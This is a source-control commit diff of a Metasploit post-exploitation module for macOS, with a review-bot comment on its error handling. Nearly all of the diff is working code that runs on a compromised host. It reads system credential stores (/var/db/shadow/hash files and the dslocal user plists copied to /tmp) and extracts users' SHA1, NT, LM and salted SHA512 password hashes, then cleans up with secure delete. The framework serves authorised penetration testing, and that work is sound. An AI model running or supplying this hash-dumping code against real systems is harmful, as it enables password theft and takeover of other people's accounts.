removed unused code and added comments, also improve a bit the extraction of the hashes in the case Lion is configured and integrated with AD
git-svn-id: file:///home/svn/framework3/trunk@13125 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
7f743a5c1b
commit
0f7166335d
|
@ -88,6 +88,7 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
return fields
|
||||
end
|
||||
|
||||
# Function for creating the folder for gathered data
|
||||
def log_folder_create(log_path = nil)
|
||||
#Get hostname
|
||||
|
@ -116,12 +117,8 @@ class Metasploit3 < Msf::Post
|
|||
# Checks if running as root on the target
|
||||
def check_root
|
||||
# Get only the account ID
|
||||
case session.type
|
||||
when /shell/
|
||||
id = session.shell_command_token("/usr/bin/id -ru").chomp
|
||||
when /meterpreter/
|
||||
id = cmd_exec("/usr/bin/id","-ru").chomp
|
||||
end
|
||||
id = cmd_exec("/usr/bin/id","-ru").chomp
|
||||
|
||||
if id == "0"
|
||||
return true
|
||||
else
|
||||
|
@ -133,12 +130,7 @@ class Metasploit3 < Msf::Post
|
|||
# Enumerate the OS Version
|
||||
def get_ver
|
||||
# Get the OS Version
|
||||
case session.type
|
||||
when /meterpreter/
|
||||
osx_ver_num = cmd_exec("/usr/bin/sw_vers", "-productVersion").chomp
|
||||
when /shell/
|
||||
osx_ver_num = session.shell_command_token("/usr/bin/sw_vers -productVersion").chomp
|
||||
end
|
||||
osx_ver_num = cmd_exec("/usr/bin/sw_vers", "-productVersion").chomp
|
||||
|
||||
return osx_ver_num
|
||||
end
|
||||
|
@ -149,12 +141,9 @@ class Metasploit3 < Msf::Post
|
|||
users = []
|
||||
nt_hash = nil
|
||||
host,port = session.tunnel_peer.split(':')
|
||||
case session.type
|
||||
when /meterpreter/
|
||||
users_folder = cmd_exec("/bin/ls","/Users")
|
||||
when /shell/
|
||||
users_folder = session.shell_command_token("/bin/ls /Users")
|
||||
end
|
||||
|
||||
users_folder = cmd_exec("/bin/ls","/Users")
|
||||
|
||||
users_folder.each_line do |u|
|
||||
next if u.chomp =~ /Shared|\.localized/
|
||||
users << u.chomp
|
||||
|
@ -168,43 +157,51 @@ class Metasploit3 < Msf::Post
|
|||
# Process each user
|
||||
users.each do |user|
|
||||
if ver_num =~ /10\.(6|5)/
|
||||
case session.type
|
||||
when /meterpreter/
|
||||
guid = cmd_exec("/usr/bin/dscl", "localhost -read /Search/Users/#{user} | grep GeneratedUID | cut -c15-").chomp
|
||||
when /shell/
|
||||
guid = session.shell_command_token("/usr/bin/dscl localhost -read /Search/Users/#{user} | grep GeneratedUID | cut -c15-").chomp
|
||||
end
|
||||
|
||||
guid = cmd_exec("/usr/bin/dscl", "localhost -read /Search/Users/#{user} | grep GeneratedUID | cut -c15-").chomp
|
||||
|
||||
elsif ver_num =~ /10\.(4|3)/
|
||||
case session.type
|
||||
when /meterpreter/
|
||||
guid = cmd_exec("/usr/bin/niutil","-readprop . /users/#{user} generateduid").chomp
|
||||
when /shell/
|
||||
guid = session.shell_command_token("/usr/bin/niutil -readprop . /users/#{user} generateduid").chomp
|
||||
end
|
||||
|
||||
guid = cmd_exec("/usr/bin/niutil","-readprop . /users/#{user} generateduid").chomp
|
||||
|
||||
elsif ver_num =~ /10\.(7)/
|
||||
|
||||
require 'rexml/document'
|
||||
hash_decoded = ""
|
||||
|
||||
# get list of profiles present in the box
|
||||
profiles = cmd_exec("ls /private/var/db/dslocal/nodes/Default/users").split("\n")
|
||||
|
||||
if profiles
|
||||
profiles.each do |p|
|
||||
# Skip none user profiles
|
||||
next if p =~ /^_/
|
||||
next if p =~ /^daemon|root|nobody/
|
||||
|
||||
# Turn profile plist in to XML format
|
||||
cmd_exec("cp /private/var/db/dslocal/nodes/Default/users/#{p.chomp} /tmp/")
|
||||
cmd_exec("plutil -convert xml1 /tmp/#{p.chomp}")
|
||||
file = cmd_exec("cat /tmp/#{p.chomp}")
|
||||
plist_values = read_ds_xml_plist(file)
|
||||
|
||||
# Clean up using secure delete overwriting and zeroing blocks
|
||||
cmd_exec("/usr/bin/srm -m -z /tmp/#{p.chomp}")
|
||||
|
||||
# Process XML Plist into a usable hash
|
||||
plist_values = read_ds_xml_plist(file)
|
||||
|
||||
# Extract the shadow hash data, decode it and format it
|
||||
plist_values['ShadowHashData'].join("").unpack('m')[0].each_byte do |b|
|
||||
hash_decoded << sprintf("%02X", b)
|
||||
end
|
||||
user = plist_values['name']
|
||||
|
||||
# Check if NT HASH is present
|
||||
if hash_decoded =~ /0304524E545D53414C5445442D5348413531324F101/
|
||||
if hash_decoded =~ /4F1010/
|
||||
nt_hash = hash_decoded.scan(/^\w*4F1010(\w*)4F1044/)
|
||||
end
|
||||
hashes = hash_decoded.gsub(/^\w*1044/,"")
|
||||
sha512 = hashes.slice(0..135)
|
||||
|
||||
# Carve out the SHA512 Hash, the first 4 bytes is the salt
|
||||
sha512 = hash_decoded.scan(/^\w*4F1044(\w*)(080B190|080D101E31)/)[0][0]
|
||||
|
||||
print_status("SHA512:#{user}:#{sha512}")
|
||||
file_local_write(sha1_file,"#{user}:#{sha512}")
|
||||
|
@ -232,7 +229,7 @@ class Metasploit3 < Msf::Post
|
|||
)
|
||||
|
||||
# Reset hash value
|
||||
nt_hash = ""
|
||||
nt_hash = nil
|
||||
end
|
||||
# Reset hash value
|
||||
hash_decoded = ""
|
||||
|
@ -242,16 +239,10 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
|
||||
# Extract the hashes
|
||||
case session.type
|
||||
when /meterpreter/
|
||||
sha1_hash = cmd_exec("/bin/cat", "/var/db/shadow/hash/#{guid} | cut -c169-216").chomp
|
||||
nt_hash = cmd_exec("/bin/cat", "/var/db/shadow/hash/#{guid} | cut -c1-32").chomp
|
||||
lm_hash = cmd_exec("/bin/cat", "/var/db/shadow/hash/#{guid} | cut -c33-64").chomp
|
||||
when /shell/
|
||||
sha1_hash = session.shell_command_token("/bin/cat /var/db/shadow/hash/#{guid} | cut -c169-216").chomp
|
||||
nt_hash = session.shell_command_token("/bin/cat /var/db/shadow/hash/#{guid} | cut -c1-32").chomp
|
||||
lm_hash = session.shell_command_token("/bin/cat /var/db/shadow/hash/#{guid} | cut -c33-64").chomp
|
||||
end
|
||||
sha1_hash = cmd_exec("/bin/cat", "/var/db/shadow/hash/#{guid} | cut -c169-216").chomp
|
||||
nt_hash = cmd_exec("/bin/cat", "/var/db/shadow/hash/#{guid} | cut -c1-32").chomp
|
||||
lm_hash = cmd_exec("/bin/cat", "/var/db/shadow/hash/#{guid} | cut -c33-64").chomp
|
||||
|
||||
|
||||
# Check that we have the hashes and save them
|
||||
if sha1_hash !~ /00000000000000000000000000000000/
|
||||
|
|
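Review bot: The SHA512 carve `sha512 = hash_decoded.scan(/^\w*4F1044(\w*)(080B190|080D101E31)/)[0][0]` indexes the scan result unchecked, so a ShadowHashData blob without either trailing marker makes `scan` return `[]` and the line raises NoMethodError on nil, aborting the loop over the remaining profiles. The outer `if` only tests for the SALTED-SHA512 header, which does not guarantee the carve pattern matches; prefer `m = hash_decoded.match(/^\w*4F1044(\w*)(080B190|080D101E31)/)` and print/store only when `m` is non-nil, with `sha512 = m[1]`. The NT branch just above assigns the raw `scan` result (an array of arrays) to `nt_hash` rather than the captured string, which looks inconsistent with the SHA512 line and would render as an inspected array if it is later interpolated; that use is outside the visible lines. `plist_values['ShadowHashData'].join` has the same nil risk for a profile with no shadow hash entry. The rendered page has lost the +/- markers, so which of these lines are new is inferred, and the enclosing method starts outside the hunks shown.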